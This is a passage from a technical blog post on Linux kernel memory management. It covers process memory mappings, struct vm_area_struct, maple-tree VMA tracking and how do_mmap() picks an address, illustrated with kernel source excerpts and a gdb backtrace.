</span></span><span class="line"><span class="cl"><span class="mi">7</span><span class="n">f556e60b000</span><span class="o">-</span><span class="mi">7</span><span class="n">f556e60d000</span> <span class="n">r</span><span class="o">--</span><span class="n">p</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span>                          <span class="p">[</span><span class="n">vvar</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="mi">7</span><span class="n">f556e60d000</span><span class="o">-</span><span class="mi">7</span><span class="n">f556e60f000</span> <span class="n">r</span><span class="o">--</span><span class="n">p</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span>                          <span class="p">[</span><span class="n">vvar_vclock</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="mi">7</span><span class="n">f556e60f000</span><span class="o">-</span><span class="mi">7</span><span class="n">f556e611000</span> <span class="n">r</span><span class="o">-</span><span class="n">xp</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span>                          <span class="p">[</span><span class="n">vdso</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="mi">7</span><span class="n">ffd933f4000</span><span class="o">-</span><span class="mi">7</span><span class="n">ffd93415000</span> <span class="n">rw</span><span class="o">-</span><span class="n">p</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span>                          <span class="p">[</span><span class="n">stack</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="n">ffffffffff600000</span><span class="o">-</span><span class="n">ffffffffff601000</span> <span class="o">--</span><span class="n">xp</span> <span class="mi">00000000</span> <span class="mi">00</span><span class="p">:</span><span class="mi">00</span> <span class="mi">0</span>                  <span class="p">[</span><span class="n">vsyscall</span><span class="p">]</span>
</span></span></code></pre></div><p>We can see even our simple program has quite a few mappings, but let&rsquo;s not get distracted! There, at <code>7f556e60a000</code>, we can see our anonymous mapping! It spans <code>0x1000</code> bytes and has the <code>rw</code> permissions we expect, neat!</p>
<p>So now we have a general idea of what a mapping is, how exactly does the kernel represent and manage our processes mappings? Queue <code>[struct vm_area_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L664)</code>!</p>
<h4 id="struct-vmareastruct"><code>struct vm_area_struct</code></h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">/*</span>
</span></span><span class="line"><span class="cl"> <span class="o">*</span> <span class="n">This</span> <span class="n">struct</span> <span class="n">describes</span> <span class="n">a</span> <span class="n">virtual</span> <span class="n">memory</span> <span class="n">area</span><span class="o">.</span> <span class="n">There</span> <span class="n">is</span> <span class="n">one</span> <span class="n">of</span> <span class="n">these</span>
</span></span><span class="line"><span class="cl"> <span class="o">*</span> <span class="n">per</span> <span class="n">VM</span><span class="o">-</span><span class="n">area</span><span class="o">/</span><span class="n">task</span><span class="o">.</span> <span class="n">A</span> <span class="n">VM</span> <span class="n">area</span> <span class="n">is</span> <span class="n">any</span> <span class="n">part</span> <span class="n">of</span> <span class="n">the</span> <span class="n">process</span> <span class="n">virtual</span> <span class="n">memory</span>
</span></span><span class="line"><span class="cl"> <span class="o">*</span> <span class="n">space</span> <span class="n">that</span> <span class="n">has</span> <span class="n">a</span> <span class="n">special</span> <span class="n">rule</span> <span class="k">for</span> <span class="n">the</span> <span class="n">page</span><span class="o">-</span><span class="n">fault</span> <span class="n">handlers</span> <span class="p">(</span><span class="n">ie</span> <span class="n">a</span> <span class="n">shared</span>
</span></span><span class="line"><span class="cl"> <span class="o">*</span> <span class="n">library</span><span class="p">,</span> <span class="n">the</span> <span class="n">executable</span> <span class="n">area</span> <span class="n">etc</span><span class="p">)</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"> <span class="o">*/</span>
</span></span><span class="line"><span class="cl"><span class="n">struct</span> <span class="n">vm_area_struct</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="n">union</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">struct</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="o">/*</span> <span class="n">VMA</span> <span class="n">covers</span> <span class="p">[</span><span class="n">vm_start</span><span class="p">;</span> <span class="n">vm_end</span><span class="p">)</span> <span class="n">addresses</span> <span class="n">within</span> <span class="n">mm</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">			<span class="n">unsigned</span> <span class="n">long</span> <span class="n">vm_start</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">			<span class="n">unsigned</span> <span class="n">long</span> <span class="n">vm_end</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="p">};</span>
</span></span><span class="line"><span class="cl"><span class="c1">#ifdef CONFIG_PER_VMA_LOCK</span>
</span></span><span class="line"><span class="cl">		<span class="n">struct</span> <span class="n">rcu_head</span> <span class="n">vm_rcu</span><span class="p">;</span>	<span class="o">/*</span> <span class="n">Used</span> <span class="k">for</span> <span class="n">deferred</span> <span class="n">freeing</span><span class="o">.</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl"><span class="c1">#endif</span>
</span></span><span class="line"><span class="cl">	<span class="p">};</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">mm_struct</span> <span class="o">*</span><span class="n">vm_mm</span><span class="p">;</span>	<span class="o">/*</span> <span class="n">The</span> <span class="n">address</span> <span class="n">space</span> <span class="n">we</span> <span class="n">belong</span> <span class="n">to</span><span class="o">.</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">pgprot_t</span> <span class="n">vm_page_prot</span><span class="p">;</span>          <span class="o">/*</span> <span class="n">Access</span> <span class="n">permissions</span> <span class="n">of</span> <span class="n">this</span> <span class="n">VMA</span><span class="o">.</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">union</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">const</span> <span class="n">vm_flags_t</span> <span class="n">vm_flags</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">vm_flags_t</span> <span class="n">__private</span> <span class="n">__vm_flags</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">};</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1">#ifdef CONFIG_PER_VMA_LOCK</span>
</span></span><span class="line"><span class="cl">	<span class="o">/*</span> <span class="n">Flag</span> <span class="n">to</span> <span class="n">indicate</span> <span class="n">areas</span> <span class="n">detached</span> <span class="n">from</span> <span class="n">the</span> <span class="n">mm</span><span class="o">-&gt;</span><span class="n">mm_mt</span> <span class="n">tree</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="ne">bool</span> <span class="n">detached</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="ne">int</span> <span class="n">vm_lock_seq</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">vma_lock</span> <span class="o">*</span><span class="n">vm_lock</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="c1">#endif</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">/*</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">For</span> <span class="n">areas</span> <span class="n">with</span> <span class="n">an</span> <span class="n">address</span> <span class="n">space</span> <span class="ow">and</span> <span class="n">backing</span> <span class="n">store</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">linkage</span> <span class="n">into</span> <span class="n">the</span> <span class="n">address_space</span><span class="o">-&gt;</span><span class="n">i_mmap</span> <span class="n">interval</span> <span class="n">tree</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">struct</span> <span class="n">rb_node</span> <span class="n">rb</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">unsigned</span> <span class="n">long</span> <span class="n">rb_subtree_last</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span> <span class="n">shared</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">/*</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">A</span> <span class="n">file</span><span class="s1">&#39;s MAP_PRIVATE vma can be in both i_mmap tree and anon_vma</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">list</span><span class="p">,</span> <span class="n">after</span> <span class="n">a</span> <span class="n">COW</span> <span class="n">of</span> <span class="n">one</span> <span class="n">of</span> <span class="n">the</span> <span class="n">file</span> <span class="n">pages</span><span class="o">.</span>	<span class="n">A</span> <span class="n">MAP_SHARED</span> <span class="n">vma</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">can</span> <span class="n">only</span> <span class="n">be</span> <span class="ow">in</span> <span class="n">the</span> <span class="n">i_mmap</span> <span class="n">tree</span><span class="o">.</span>  <span class="n">An</span> <span class="n">anonymous</span> <span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="n">stack</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="ow">or</span> <span class="n">brk</span> <span class="n">vma</span> <span class="p">(</span><span class="n">with</span> <span class="n">NULL</span> <span class="n">file</span><span class="p">)</span> <span class="n">can</span> <span class="n">only</span> <span class="n">be</span> <span class="ow">in</span> <span class="n">an</span> <span class="n">anon_vma</span> <span class="n">list</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">list_head</span> <span class="n">anon_vma_chain</span><span class="p">;</span> <span class="o">/*</span> <span class="n">Serialized</span> <span class="n">by</span> <span class="n">mmap_lock</span> <span class="o">&amp;</span>
</span></span><span class="line"><span class="cl">					  <span class="o">*</span> <span class="n">page_table_lock</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">anon_vma</span> <span class="o">*</span><span class="n">anon_vma</span><span class="p">;</span>	<span class="o">/*</span> <span class="n">Serialized</span> <span class="n">by</span> <span class="n">page_table_lock</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">/*</span> <span class="n">Function</span> <span class="n">pointers</span> <span class="n">to</span> <span class="n">deal</span> <span class="n">with</span> <span class="n">this</span> <span class="n">struct</span><span class="o">.</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="k">const</span> <span class="n">struct</span> <span class="n">vm_operations_struct</span> <span class="o">*</span><span class="n">vm_ops</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">/*</span> <span class="n">Information</span> <span class="n">about</span> <span class="n">our</span> <span class="n">backing</span> <span class="n">store</span><span class="p">:</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">unsigned</span> <span class="n">long</span> <span class="n">vm_pgoff</span><span class="p">;</span>		<span class="o">/*</span> <span class="n">Offset</span> <span class="p">(</span><span class="n">within</span> <span class="n">vm_file</span><span class="p">)</span> <span class="ow">in</span> <span class="n">PAGE_SIZE</span>
</span></span><span class="line"><span class="cl">					   <span class="n">units</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">file</span> <span class="o">*</span> <span class="n">vm_file</span><span class="p">;</span>		<span class="o">/*</span> <span class="ne">File</span> <span class="n">we</span> <span class="n">map</span> <span class="n">to</span> <span class="p">(</span><span class="n">can</span> <span class="n">be</span> <span class="n">NULL</span><span class="p">)</span><span class="o">.</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">void</span> <span class="o">*</span> <span class="n">vm_private_data</span><span class="p">;</span>		<span class="o">/*</span> <span class="n">was</span> <span class="n">vm_pte</span> <span class="p">(</span><span class="n">shared</span> <span class="n">mem</span><span class="p">)</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1">#ifdef CONFIG_ANON_VMA_NAME</span>
</span></span><span class="line"><span class="cl">	<span class="o">/*</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">For</span> <span class="n">private</span> <span class="ow">and</span> <span class="n">shared</span> <span class="n">anonymous</span> <span class="n">mappings</span><span class="p">,</span> <span class="n">a</span> <span class="n">pointer</span> <span class="n">to</span> <span class="n">a</span> <span class="n">null</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">terminated</span> <span class="n">string</span> <span class="n">containing</span> <span class="n">the</span> <span class="n">name</span> <span class="n">given</span> <span class="n">to</span> <span class="n">the</span> <span class="n">vma</span><span class="p">,</span> <span class="ow">or</span> <span class="n">NULL</span> <span class="k">if</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">unnamed</span><span class="o">.</span> <span class="n">Serialized</span> <span class="n">by</span> <span class="n">mmap_lock</span><span class="o">.</span> <span class="n">Use</span> <span class="n">anon_vma_name</span> <span class="n">to</span> <span class="n">access</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">anon_vma_name</span> <span class="o">*</span><span class="n">anon_name</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="c1">#endif</span>
</span></span><span class="line"><span class="cl"><span class="c1">#ifdef CONFIG_SWAP</span>
</span></span><span class="line"><span class="cl">	<span class="n">atomic_long_t</span> <span class="n">swap_readahead_info</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="c1">#endif</span>
</span></span><span class="line"><span class="cl"><span class="c1">#ifndef CONFIG_MMU</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">vm_region</span> <span class="o">*</span><span class="n">vm_region</span><span class="p">;</span>	<span class="o">/*</span> <span class="n">NOMMU</span> <span class="n">mapping</span> <span class="n">region</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl"><span class="c1">#endif</span>
</span></span><span class="line"><span class="cl"><span class="c1">#ifdef CONFIG_NUMA</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">mempolicy</span> <span class="o">*</span><span class="n">vm_policy</span><span class="p">;</span>	<span class="o">/*</span> <span class="n">NUMA</span> <span class="n">policy</span> <span class="k">for</span> <span class="n">the</span> <span class="n">VMA</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl"><span class="c1">#endif</span>
</span></span><span class="line"><span class="cl"><span class="c1">#ifdef CONFIG_NUMA_BALANCING</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">vma_numab_state</span> <span class="o">*</span><span class="n">numab_state</span><span class="p">;</span>	<span class="o">/*</span> <span class="n">NUMA</span> <span class="n">Balancing</span> <span class="n">state</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl"><span class="c1">#endif</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">vm_userfaultfd_ctx</span> <span class="n">vm_userfaultfd_ctx</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span> <span class="n">__randomize_layout</span><span class="p">;</span>
</span></span></code></pre></div><p>Perhaps understandably, there&rsquo;s a lot going on here! But this is the structure, referred to as a <code>vma</code>, that describes the virtual memory areas of a process. For example, you can see at the top <code>vm_start</code> and <code>vm_end</code> define the star and end addresses of the vma; just below that <code>vm_mm</code> holds a reference to the <code>mm</code> the vma belongs etc.</p>
<p>We&rsquo;ll touch more on each field as it becomes relevant, but I just wanted to introduce the structure here rather than trying to wedge it in when it crops up down the line.</p>
<h4 id="mm-mmmt"><code>mm-&gt;mm_mt</code></h4>
<p>Okay, so a vma describes a single memory area, but as we saw, even our little program has quite a few memory areas - how are these all managed? Good question!</p>
<p>Each process is responsible for tracking its memory areas, and as we know, each process&rsquo;s memory is managed by a <code>[mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779)</code>! So this is where we&rsquo;ll find our answer:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">struct mm_struct {
</span></span><span class="line"><span class="cl">		// SNIP
</span></span><span class="line"><span class="cl">		struct maple_tree mm_mt;
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">include/linux/mm_types.h</a></p>
<p>Previously, this would have been <code>struct rb_root mm_rb;</code>, but since 6.1 the kernel moved from red-black trees to the <code>[maple_tree](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/maple_tree.h#L219)</code> data structure for vma management.</p>
<p>I&rsquo;m but a humble researcher, so if you&rsquo;re interested in diving more into maple tree internals, this <a href="https://lwn.net/Articles/845507/">LWN article</a> does a great job introducing maple trees (alternatively, head straight to the <a href="https://docs.kernel.org/core-api/maple_tree.html">kernel docs</a>). Suffice it to say it&rsquo;s a cache-optimised, low memory footprint data structure ideal for storing non-overlapping ranges - perfect for vmas!</p>
<p>The key details to highlight are that:</p>
<ul>
<li><code>mm_mt</code> is the tree of vmas belonging to the <code>mm_struct</code>&rsquo;s process,</li>
<li>A VMA is represented as a node within the tree, but the tree is also able to track gaps between these VMAs (i.e. gaps in the virtual address space)</li>
<li>The maple tree data structure comes with its own normal and advanced API, but there are also a set of wrapper functions specifically for handling vma maple tree usage</li>
</ul>
<h3 id="dommap"><code>do_mmap()</code></h3>
<p><img src="https://sam4k.com/content/images/2025/04/so_where_we_were.gif" alt=""></p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cm">/*
</span></span></span><span class="line"><span class="cl"><span class="cm"> * The caller must write-lock current-&gt;mm-&gt;mmap_lock.
</span></span></span><span class="line"><span class="cl"><span class="cm"> */</span>
</span></span><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">do_mmap</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">len</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">prot</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">,</span> <span class="kt">vm_flags_t</span> <span class="n">vm_flags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">pgoff</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="n">populate</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">uf</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255">mm/mmap.c</a></p>
<p>Okay, let&rsquo;s get back to it! For some context, upon entering <code>[do_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255)</code>:</p>
<ul>
<li><code>file</code> is NULL as we&rsquo;re mapping anonymous memory (<code>[MAP_ANONYMOUS](https://elixir.bootlin.com/linux/v6.11.5/source/include/uapi/asm-generic/mman-common.h#L23)</code>), i.e. we&rsquo;re not mapping a file into our userspace process, but a chunk of &ldquo;anonymous&rdquo; physical memory.</li>
<li><code>vm_flags</code> stores the flags used for the virtual memory mapping we&rsquo;re creating. In this case, the caller <code>[vm_mmap_pgoff()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575)</code> does not specify any flags.</li>
<li><code>populate</code> is an <code>unsigned long*</code> initialised by <code>do_mmap()</code> and read by the caller, to determine if the mapping should be &ldquo;populated&rdquo; before returning to userspace. We&rsquo;ll touch more on the significance of that later, just know that a mapping is populated when <code>MAP_POPULATE</code> is set and <code>MAP_NONBLOCK</code> is not (so not our case study).</li>
<li><code>uf</code>, which relates to <code>[userfaultfd(2)](https://man7.org/linux/man-pages/man2/userfaultfd.2.html)</code>, is a linked list initialised by the caller. It&rsquo;s not touched in <code>do_mmap()</code> and probably out of scope for this series anyway, so we&rsquo;ll ignore it for now.  </li>
<li><code>addr</code>, <code>len</code>, <code>prot</code>, <code>flags</code>, <code>pgoff</code> all correspond to the same values we passed into <code>mmap(2)</code> from our userspace program.</li>
</ul>
<p>Okay, so what&rsquo;s the goal of this function? We know from exploring the previous functions in the call stack that the return value is the value that <code>mmap(2)</code> returns to userspace: on success, the userspace address of the mapping; on error, the <code>MAP_FAILED</code> value (<code>(void *) -1</code>).  So where does <code>do_mmap(2)</code>&rsquo;s return value come from?</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">do_mmap</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">len</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">prot</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">,</span> <span class="kt">vm_flags_t</span> <span class="n">vm_flags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">pgoff</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="n">populate</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">uf</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">	<span class="n">addr</span> <span class="o">=</span> <span class="nf">mmap_region</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">vm_flags</span><span class="p">,</span> <span class="n">pgoff</span><span class="p">,</span> <span class="n">uf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255">mm/mmap.c</a></p>
<p>Hm, so it looks like the rabbit hole goes deeper! <code>do_mmap(2)</code>&rsquo;s job is to process and sanitise its arguments so that they can be passed to <code>mmap_region(2)</code> which sets up up the actual memory mapping (right??? surely there&rsquo;s no more calls).</p>
<p>More specifically, <code>do_mmap()</code> has a few responsibilities, including:</p>
<ul>
<li>Sanitising values and performing any necessary checks, such as preventing overflows or stopping the user exceeding the maximum mapping count defined by <code>[sysctl_max_map_count](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L202)</code>.</li>
<li>Calculating the correct <code>vm_flags</code>, which are later applied to the <code>struct vm_area_struct</code> created for this mapping, based off of various factors such as <code>prot</code>, <code>flags</code>, <code>mm-&gt;def_flags</code> etc.</li>
<li>Determining what userspace virtual address, stored in <code>addr</code>, is passed to <code>[mmap_region()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849)</code>.</li>
</ul>
<h4 id="finding-a-suitable-addr">Finding A Suitable <code>addr</code></h4>
<p><img src="https://sam4k.com/content/images/2025/04/our_address.gif" alt=""></p>
<p>In order to find a suitable <code>addr</code> for our new memory mapping, broadly speaking, there&rsquo;s two general cases for <code>do_mmap()</code> to consider:</p>
<ul>
<li>Case A: <code>flags</code> includes <code>MAP_FIXED | MAP_FIXED_NOREPLACE</code></li>
<li>Case B: <code>flags</code> doesn&rsquo;t include <code>MAP_FIXED | MAP_FIXED_NOREPLACE</code> (our case)</li>
</ul>
<p>For Case A, the fixed <code>addr</code> specified by the user is passed to <code>mmap_region()</code>. However, the virtual address range spanned by this new mapping (<code>addr</code> to <code>addr + len</code>) might overlap existing ones. The default behaviour is to unmap the overlapped part. If <code>MAP_FIXED_NOREPLACE</code> is set though, <code>do_mmap()</code> will return <code>-EEXIST</code> if the new mapping will end up overlapping any existing ones.</p>
<p>Otherwise, in case B, the kernel will determine the <code>addr</code>. The value of <code>addr</code> passed by the user is actually used as a hint about where to place the mapping. Note the &ldquo;hint&rdquo; <code>addr</code> is page aligned and rounded to a minimum value of <code>mmap_min_addr</code>[1] by <code>[round_hint_to_min()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1194)</code> (which will happen in our case, as <code>addr == 0</code>).</p>
<p>In either case, <code>[__get_unmapped_area()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1923)</code> is called to determine an appropriate <code>addr</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl">	<span class="cm">/* Obtain the address to map to. we verify (or select) it and ensure
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * that it represents a valid section of the address space.
</span></span></span><span class="line"><span class="cl"><span class="cm">	 */</span>
</span></span><span class="line"><span class="cl">	<span class="n">addr</span> <span class="o">=</span> <span class="nf">__get_unmapped_area</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">pgoff</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span class="n">vm_flags</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="nf">IS_ERR_VALUE</span><span class="p">(</span><span class="n">addr</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1325">mm/mmap.c</a></p>
<p>To avoid getting to lost in the sauce, we&rsquo;ll skim over this function. Essentially it does some more sanitisation and checks. This includes another LSM hook (<code>mmap_addr</code>) on the <code>addr</code> yielded at the end of this function, as well as an arch specific check (<code>arch_mmap_check()</code>) which is currently only used by <code>arm</code> and <code>sparc</code>.</p>
<p>The approach used to get the unmapped area depends on a few factors:</p>
<ul>
<li>If its a file, some file types may implement their own method to get an area.</li>
<li>If it&rsquo;s a shared anonymous mapping, rather than directly allocating physical memory it actually uses a special shmem (shared memory) file (maybe we&rsquo;ll touch on this later)</li>
<li>Finally, if neither case (i.e. <code>MAP_PRIVATE | MAP_ANON</code>), it will use either <code>[thp_get_unmapped_area_vmflags()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/huge_memory.c#L926)</code> (if <code>CONFIG_TRANSPARENT_HUGEPAGE=y</code>) or <code>[mm_get_unmapped_area_vmflags()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1911)</code> - this is the case we&rsquo;re interested in!</li>
</ul>
<p>Transparent Huge Pages (THPs) are a kernel feature for &hellip; you guessed it! Enabling huge pages, transparently! Currently for anonymous memory mappings and tmpfs/shmem.</p>
<p>If we recall our <a href="https://sam4k.com/linternals-memory-allocators-part-1/#page-primer">page primer</a>, pages are typically defined as 4KB (<code>0x1000</code> bytes) chunks of physical memory. A &ldquo;huge page&rdquo; here is 2M (<code>0x200000</code> bytes) in size. So the tl;dr here is that <code>thp_get_unmapped_area_vmflags()</code> will try and align the <code>addr</code> to a 2M boundary so that it can be used as a huge page automatically (AKA transparently!). It&rsquo;s okay if this doesn&rsquo;t make total sense yet, as we&rsquo;ll cover paging in more detail soon!</p>
<p>Either way it will end up using <code>mm_get_unmapped_area_vmflags()</code>, so that&rsquo;s where we&rsquo;ll go next! Well, briefly. Because this function will then call into an arch specific function depending on if the <code>MMF_TOPDOWN</code> bit is set in our processes&rsquo; <code>mm-&gt;flags</code>. This determines whether we&rsquo;ll search from the top or bottom of our address space for an unmapped area.</p>
<p>On x86_64 this is set, which leads us to <code>[arch_get_unmapped_area_topdown_vmflags()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161)</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) bt
</span></span><span class="line"><span class="cl">#0  arch_get_unmapped_area_topdown_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr0=0, len=4096, pgoff=0, flags=34, vm_flags=115)
</span></span><span class="line"><span class="cl">    at arch/x86/kernel/sys_x86_64.c:164
</span></span><span class="line"><span class="cl">#1  0xffffffff81244143 in mm_get_unmapped_area_vmflags (mm=&lt;optimized out&gt;, filp=filp@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, 
